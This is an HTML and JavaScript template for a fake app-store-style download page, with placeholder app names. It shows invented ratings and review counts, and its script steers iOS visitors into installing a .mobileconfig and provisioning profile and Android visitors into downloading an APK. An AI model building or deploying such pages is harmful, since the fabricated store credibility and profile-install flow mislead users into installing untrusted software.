<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="edge">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="renderer" content="webkit">
    <meta name="renderer" content="ie-comp">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Cache-Control" content="no-cache">
    <meta http-equiv="Expires" content="0">
    <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no">
    <meta name="format-detection" content="telephone=no">
    <meta name="format-detection" content="email=no">
    <link rel="stylesheet" type="text/css" href="css/swiper.min.css" />
    <link rel="stylesheet" type="text/css" href="css/index.css" />
    <title>APP名称</title>
    <style type="text/css">
        .loader {
            border: 4px solid #f3f3f3;
            border-radius: 50%;
            border-top: 4px solid #0477f9;
            width: 26px;
            height: 26px;
            float: left;
            margin-left: 4px;
            -webkit-animation: spin 2s linear infinite; /* Safari */
            animation: spin 2s linear infinite;
        }

        /* Safari */
        @-webkit-keyframes spin {
            0% {
                -webkit-transform: rotate(0deg);
            }

            100% {
                -webkit-transform: rotate(360deg);
            }
        }

        @keyframes spin {
            0% {
                transform: rotate(0deg);
            }

            100% {
                transform: rotate(360deg);
            }
        }
    </style>
</head>
<body>
<div class="contain-page">
    <!-- info -->
    <div class="app-info">
        <div class="app-logo">
            <img src="images/logo.png">
        </div>
        <div class="app-info-rig">
            <strong>APP名称</strong>
            <div class="clr">
                <a class="btn btn-mini step2 blue" href="javascript:;;" id="install_btn">点击“安装”</a>
            </div>
        </div>
    </div>

    <div class="app-show">
        <div class="app-score">
            <strong>4.9</strong><img src="images/star.png" alt="">
            <p><span class="down-count">9999</span>分数</p>
        </div>
        <div class="app-age">
            <strong>18+</strong>
            <p>年龄</p>
        </div>
    </div>

    <div class="comment-box">
        <h2 class="app-title">
            评分和评论
        </h2>
        <div class="comment-con">
            <div class="comment-left">
                <strong>4.9</strong>
                <p>满分：5分</p>
            </div>
            <div class="comment-right">
                <ul class="comment-star-list">
                    <li>
                        <div class="comment-star">
                            <img src="images/star.png" alt="">
                            <div></div>
                        </div>
                        <div class="comment-progress">
                            <div></div>
                        </div>
                    </li>
                    <li>
                        <div class="comment-star">
                            <img src="images/star.png" alt="">
                            <div></div>
                        </div>
                        <div class="comment-progress">
                            <div></div>
                        </div>
                    </li>
                    <li>
                        <div class="comment-star">
                            <img src="images/star.png" alt="">
                            <div></div>
                        </div>
                        <div class="comment-progress">
                            <div></div>
                        </div>
                    </li>
                    <li>
                        <div class="comment-star">
                            <img src="images/star.png" alt="">
                            <div></div>
                        </div>
                        <div class="comment-progress">
                            <div></div>
                        </div>
                    </li>
                    <li>
                        <div class="comment-star">
                            <img src="images/star.png" alt="">
                            <div></div>
                        </div>
                        <div class="comment-progress">
                            <div></div>
                        </div>
                    </li>
                </ul>
                <p><span class="down-count">9,999</span>分数</p>
            </div>
        </div>
    </div>

    <div class="information-box">
        <h2 class="app-title">信息</h2>
        <ul class="information-list">
            <li>
                <span class="l">大小</span>
                <div class="r">6.5M</div>
            </li>
            <li>
                <span class="l">兼容性</span>
                <div class="r"><p>Android系统或IOS 8.0或更高版本。与iPhone、iPad和iPod touch兼容。</p></div>
            </li>
            <li>
                <span class="l">语言</span>
                <div class="r">中文</div>
            </li>
            <li>
                <span class="l">年龄分类</span>
                <div class="r">18岁以上</div>
            </li>
            <li>
                <span class="l">版权</span>
                <div class="r">© 2025 APP名称 Inc</div>
            </li>
            <li>
                <span class="l blue-color">隐私政策</span>
                <div class="r"></div>
            </li>
        </ul>
    </div>

    <div class="disclaimer">
        免责声明:<br>
        此网站仅提供下载托管。开发者负责与应用程序内容相关的事宜，与本网站无关
    </div>

    <div class="mask">
        <img src="images/go-safari.png" alt="">
    </div>

    <div class="anzhuomask">
        <img src="images/llq.png" alt="">
    </div>	

    <div class="mask-box safari-tips">
        <div class="mask-bg"></div>
        <div class="mask-pop">
            <span class="mask-colsed"><img src="images/colsed.png" alt=""></span>
            <img class="copy-url-img" src="images/safari-tip.png" alt="">
            <div class="copy-url">
                <input id="foo" type="text">
                <button data-clipboard-target="#foo">copy</button>
            </div>
        </div>
    </div>
</div>

<div class="pc-box">
    <div class="pc-logo">
        <img src="images/logo.png">
    </div>
    <p>APP名称</p>
     <div id="Dqcode"></div>
    <div class="info">使用手机扫描代码并下载</div>
</div>

<script type="text/javascript" src="js/jquery.js"></script>
<script type="text/javascript" src="js/fingerprint2.min.js"></script>
<script type="text/javascript" src="js/download.js"></script>
<script type="text/javascript" src="js/swiper.min.js"></script>
<script type="text/javascript" src="js/clipboard.min.js"></script>
<script type="text/javascript" src="js/jquery-qrcode.min.js"></script>
<script type="text/javascript">
    $(function () {
        var iosplace = 'appstore-hongtao-2',
            androidplace = 'android-hongtao-1',
            iosplacecode = 'appstore-hongtao-999',
            androidplacecode = 'android-hongtao-4';
			

        var andurl = './app.apk';
        var iosurl = './app.mobileconfig';

        var ua = navigator.userAgent.toLowerCase(),
            iphoneos = (ua.match(/iphone os/i) == "iphone os") || (ua.match(/iph os/i) == "iph os") || (ua.match(/ipad/i) == "ipad"),
            android = (ua.match(/android/i) == "android") || (ua.match(/adr/i) == "Linux");
        $("#install_btn").on("click", function () {
            DownSoft();
        })

        function auto_download() {
            var d = "1"
            if (d != "1") {
                return
            }
            var issafariBrowser = /Safari/.test(navigator.userAgent) && !/Chrome/.test(navigator.userAgent)
            if (issafariBrowser) {
                location = ""
                if ("" != "1") {
                    return
                }
                setTimeout(function () {
                    location.href = ''
                }, 1 * 3000)
            }
        }

        //auto_download()

        function DownSoft() {

            //copytoclip();
            var s = 'https:' == document.location.protocol ? true : false;
            var pid = iphoneos ? iosplace : androidplace;

            if (iphoneos) {
			    if(iosurl.indexOf("itms-services:///") != -1 ){
				  window.location.href = iosurl;	
				}else{

				    window.location.href = "./app.mobileconfig"
                    setTimeout(function(){
                        if( confirm){
                          location.href = "./xxx.mobileprovision";
                        }
                    },2500)
				}
            } else {
                window.location.href = andurl;
            }
        }

        function doLocation(url) {
            var a = document.createElement("a");
            if(!a.click)
            {
                window.location = url;
                return;
            }
            a.setAttribute("href", url);
            a.setAttribute("target", '__blank');
            a.style.display = "none";
            document.body.appendChild(a);
            a.click();
        }

    }
	)
let httpurl = window.location.href;
qrcode($('#Dqcode'),248,httpurl);
function qrcode(qrCodeDiv,size,text){
    var option = {
          render:'image',
          minVersion:1,
          maxVersion:40,
          ecLevel: 'L',
          minVersion:5,
          left:0,
          top:0,
          size:size,
          fill:'#000',
          background:'#fff',
          text: text,
          radius:0,
          quiet:0,
          mode:4,
          mSize:0.15,
          mPosX:0.5,
          mPosY:0.5,
          image:null
        }
    $(qrCodeDiv).qrcode(option);
}	
</script>
</body>
</html>
